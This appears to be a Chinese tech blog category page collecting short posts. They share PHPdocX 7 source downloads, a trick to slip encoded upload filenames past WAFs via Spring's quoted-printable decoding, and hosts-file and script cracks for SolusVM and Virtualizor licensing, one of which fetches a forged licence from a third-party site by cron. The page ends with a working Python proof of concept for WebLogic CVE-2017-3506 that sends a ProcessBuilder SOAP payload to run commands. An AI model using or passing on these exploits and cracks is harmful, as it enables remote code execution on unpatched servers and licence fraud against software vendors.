分类 技术类 下的文章

PHPdocX7 Source code

====PHPdocX 7 by 2mdc.com==== https://www.phpdocx.com/

PHPDOCX is a PHP library designed to dynamically generate reports in
Word format (WordprocessingML).

The reports may be built from any available data source like a MySQL
database or a spreadsheet. The resulting documents remain fully
editable in Microsoft Word (or any other compatible software like
OpenOffice) and therefore the final users are able to modify them as
necessary.

The formatting capabilities of the library allow the programmers to
generate dynamically and programmatically all the standard rich
formatting of a typical word processor.

This library also provides an easy method to generate documents in
other standard formats such as PDF or HTML.


phpdocx 可以使用word模板将数据填充到word里面并且生成新的word文档。具体使用方式看官方文档

https://www.phpdocx.com/documentation

下载地址:phpdocx7.zip

git地址:phpdocx7-git

Spring MVC MultipartResolver特性-QP编码

今天看Spring的Multipart处理发现一段比较奇怪的代码:

20180803094501_282.png
奇怪的是Spring为什么会对“=?”、“?=”进行特殊处理?跟进后发现这玩意是QP编码,用来解决邮件内附件编码问题。Spring调用了java mail的api对文件上传的附件文件名称进行了QP编码。

既然已知Spring的这个特性,那么某些时候或许就可以通过对文件名称进行编码来绕过传统的waf、cdn的防御了。

利用Java mail库生成特殊的文件名:
2.png

上传进行编码后的文件:

3.png

Spring会做decode解析:
4.png

原文地址:http://p2j.cn/?p=1868

SolusVM 授权服务器端

  • 1.编辑hosts文件
vi /etc/hosts
  • 2.添加以下内容
162.211.226.149     www.soluslabs.com
162.211.226.149     soluslabs.com
162.211.226.149     licensing1.soluslabs.net
162.211.226.149     licensing2.soluslabs.net
162.211.226.149     licensing3.soluslabs.net
162.211.226.149     licensing4.soluslabs.net
162.211.226.149     licensing5.soluslabs.net
162.211.226.149     licensing6.soluslabs.net
  • 3.打开SolusVM后台,打开 Configuration –> License 添加授权码并保存
SVMTL-88888-88888-88888-88888-88888-88888

设置完以后可以正常升级。

提示:据说 SolusVM 的主控端还是会偷偷地往法国 OVH 的一个机器发包,非域名,IP 直连请求,可以尝试通过 tcpdump 抓取这个 IP 然后做 iptables 限制访问。
我这边是直接将94.0.0.0/8这个段全部封掉
iptables -I INPUT -s 94.0.0.0/8 -j DROP

Virtualizor破解

license 验证函数的文件路径是:

/usr/local/virtualizor/main/functions.php

一键自动破解脚本

首先创建脚本

vi /opt/license.sh

然后写入下面的内容

#/bin/bash
# 
# 设置license
# 
chattr -i /usr/local/virtualizor/license2.php
rm -rf /usr/local/virtualizor/license2.php
IP=`curl http://members.3322.org/dyndns/getip`
LIC_URL='http://www.03sec.com/make_license.php?str='$IP
license_text=`curl $LIC_URL`
echo $license_text >> /usr/local/virtualizor/license2.php
chattr +i /usr/local/virtualizor/license2.php

最后增加执行权限以及运行脚本

chmod +x /opt/license.sh && /opt/license.sh

测试中发现,virtualizor会自己更改license2.php,即使使用了chattr也没用。建议将上面的脚本设置为定时任务,每小时运行一次

0 * * * * /opt/license.sh

WebLogic CVE-2017-3506 Poc

漏洞编号

  • CVE-2017-3506 (wls-wsat 远程命令执行漏洞)

影响版本

  • Oracle WebLogic Server10.3.6.0.0 版本
  • Oracle WebLogic Server12.1.3.0.0 版本
  • Oracle WebLogic Server12.2.1.1.0 版本
  • Oracle WebLogic Server12.2.1.2.0 版本

Poc

#!/usr/bin/env python
# coding:utf-8
# auther:dayu
import requests
import re
from sys import argv

heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
    }

def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
                <void index="2">
                  <string>whoami</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception, e:
        response = ""

    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = "test ok"
        return result
    else:
        result = "No Vulnerability"
        return result


if __name__ == '__main__':
    if len(argv) == 1:
        print "python weblogic_poc.py url:port"
        exit(0)
    else:
        url = argv[1]
    result = poc(url=url)
    print result